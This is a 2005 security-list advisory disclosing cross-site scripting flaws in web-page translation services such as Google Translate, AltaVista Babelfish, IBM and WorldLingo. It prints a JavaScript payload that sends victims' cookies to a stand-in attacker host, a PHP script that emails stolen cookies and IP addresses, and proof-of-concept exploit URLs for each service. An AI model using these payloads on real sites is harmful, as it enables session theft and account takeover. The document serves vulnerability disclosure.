<<< Date Index >>>     <<< Thread Index >>>

Multiple Translation websites Cross Site Scripting vulnerability: Google, Altavista, IBM, freetranslation, worldlingo, etc



Title: Multiple Translation websites Cross Site Scripting
       vulnerability

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Date: 22 December 2005
MorX Security Research Team
http://www.morx.org

Service: Translation tools/websites

Vendors: Google, altavista, IBM, freetranslation, worldlingo
         paralink and almost any site using the webpage translation
         technique

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Tested on: Microsoft IE 6.0 and firefox 5.1
           (should work on all browsers)

Details:

the following is a Cross Site Scripting vulnerability that i ve found so far
in all translation websites that i ve seen, these websites use URL webpage
translation method which consist of passing a url of a user choice to the web
application for translating purpose, in fact after the webpage is being
processed
(translated) the application dosent filter the webpage content before
outputing it
into the user browser.

Impact:

a remote attacker can construct a malicious code in a webpage then upload
it to his/her
webserver and make a vulnerable website user visit the page thru the
translation script
and therefor execute the malicious code contents by the client browser.

malicous code as an example can be a javascript code to steal the victim
cookie

exemple of a malicious webpage:

<SCRIPT>location.href='http://www.attacker-site/grabber.php?cookie='+escape(document.cookie)</SCRIPT>

this javascript code will redirect the victim to the attacker php script
to grab the cookie information
and then log it or/and send it back the the attacker email

exemple of a php grabber

<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("attacker@xxxxxxxxxxxxxxxxx", $subject, $msg);
?>

for testing purpose you may use the following javascript

<script>alert('VULNERABLE'); alert(document.cookie);</script>

Proof Of Concept Exploits:

The following list is just a very small list of many vulnerable websites

paralink:

http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.attacker-site/malicious-code.html

Google:

http://translate.google.com/translate?u=http://www.attacker-site/malicious-code.html

Freetranslation:

http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&Language=English%2FSpanish&Sequence=core

Altavista:

http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.attacker-site/malicious-code.html&lp=zh_en

IBM:

http://www.alphaworks.ibm.com/aw.nsf/html/mt
http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.attacker-site%252Fmalicious-code.html

Worldlingo:

http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.attacker-site.com&wl_url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html

Comprendium:

http://www.comprendium.es/index_demo_text_ca.html

online-translator:

http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12

systranbox:

http://www.systranbox.com/systran/box


... and more

screen captures demonstrating the vulnerabilities:


www.morx.org/altavista.JPG
www.morx.org/altavista2.JPG

www.morx.org/google.JPG

www.morx.org/worldlingo.JPG
www.morx.org/worldlingo2.JPG

www.morx.org/freetranslation.JPG
www.morx.org/freetranslation2.JPG

www.morx.org/paralink.JPG
www.morx.org/paralink2.JPG

www.morx.org/online-translator.JPG

www.morx.org/ibm.JPG

www.morx.org/comprendium.JPG

www.morx.org/systran.JPG

Disclaimer:

this entire document is for eductional purposes and testing only.
Modification use and/or publishing this
information is entirely on your OWN risk, I cannot be held responsible for
any of the above

Most of the vendors were already contacted and informed about these
problems, some confirmed some didnt
answer back and some werent contacted because i couldnt find their contact
information.

My x-mas wish:

petit papa noel quand tu decendra du ciel avec tes cadeaux par milier n
oubli pas de foutre une bi** dans
le cu* a Abder (je t aime quand meme) :D

Greets:

Special Greets and Thanks to HandriX and all MorX members, Securma Massine
and Anasoft. greets to my brother
in fuxoring Abder :>


--